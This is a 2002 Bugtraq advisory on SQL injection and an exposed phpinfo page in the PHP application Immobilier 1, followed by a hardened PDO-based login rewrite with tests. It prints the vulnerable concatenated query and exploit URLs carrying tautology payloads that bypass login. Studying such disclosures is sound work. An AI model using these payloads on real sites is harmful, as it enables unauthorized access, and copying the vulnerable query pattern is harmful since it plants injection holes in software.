Bugtraq mailing list archives

Immobilier 1 (PHP)


From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 25 Nov 2002 17:33:24 +0100








Informations :
°°°°°°°°°°°°°°
Version, Website : ?
Problems :
- phpinfo()
- SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
agentadmin.php :
--------------------------------------------------------------
[...]
} elseif ($agentname != "" OR $current_user != "")
        {
$sql = "SELECT id FROM agents WHERE agent='$agentname' and agentpass='$agentpassword'";
        $result = mysql_query($sql) or die("Couldn't execute query.");
        $num = mysql_numrows($result);
        if ($num == 1) {
                session_register("agentname");
                session_register("agentpassword");
                [...]
                session_register("current_user");
                session_register("agent");
[...]
--------------------------------------------------------------


admin/phpinfo.php :
-----------
<?
phpinfo();
?>
-----------

Exploits :
°°°°°°°°°°
http://[target]/agentadmin.php?agentname='%20OR%20''='&agentpassword='%20OR%20''='
or
http://[target]/agentadmin.php?agentname=[USERNAME]&agentpasword='%20OR%20''='

http://[target]/admin/phpinfo.php

Solutions :
°°°°°°°°°°°
- Delete /admin/phpinfo.php
- Put these lines :
------------------------------------------
$agentname=addslashes($agentname);
$current_user=addslashes($current_user);
$agentpassword=addslashes($agentpassword);
------------------------------------------
into common.php.
A patch can be found on http://www.phpsecure.org.


More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/Immoblier.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FImmoblier.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII


frog-m@n
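
An added example, not part of the original post and not Immobilier's code: the login lookup from agentadmin.php rewritten with a bound parameter and a hashed-password check, so the quoting the addslashes() fix depends on is no longer needed. The table and column names follow the advisory's query; the agent_login() helper, the in-memory SQLite database standing in for MySQL, and the sample row are assumptions constructed for the example.

```php
<?php
// Added example: not Immobilier's code. Table and column names follow the
// advisory's query; agent_login() and the sample row are constructed.
declare(strict_types=1);

function make_db(): PDO {
    // In-memory SQLite stands in for the application's MySQL database.
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE agents (id INTEGER PRIMARY KEY, agent TEXT UNIQUE, agentpass TEXT)');
    $ins = $db->prepare('INSERT INTO agents (agent, agentpass) VALUES (?, ?)');
    $ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $db;
}

function agent_login(PDO $db, $name, $password): ?int {
    // Request parameters can arrive as arrays; accept only non-empty strings.
    if (!is_string($name) || !is_string($password) || $name === '') {
        return null;
    }
    // The value is bound, never concatenated, so quotes in $name stay data.
    $stmt = $db->prepare('SELECT id, agentpass FROM agents WHERE agent = ?');
    $stmt->execute([$name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Compare against a stored hash instead of matching the password in SQL.
    if ($row === false || !password_verify($password, $row['agentpass'])) {
        return null;
    }
    return (int) $row['id'];
}

$db = make_db();
$tautology = "' OR ''='";   // decoded parameter value from the advisory's URLs

var_dump(agent_login($db, 'alice', 'correct horse'));  // valid credentials
var_dump(agent_login($db, $tautology, $tautology));    // tautology in both fields
var_dump(agent_login($db, 'alice', $tautology));       // known user, tautology password
var_dump(agent_login($db, ['x'], 'y'));                // non-string input
```

Only the first call returns an agent id; the other three return NULL because the submitted strings are compared as values and never parsed as SQL.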



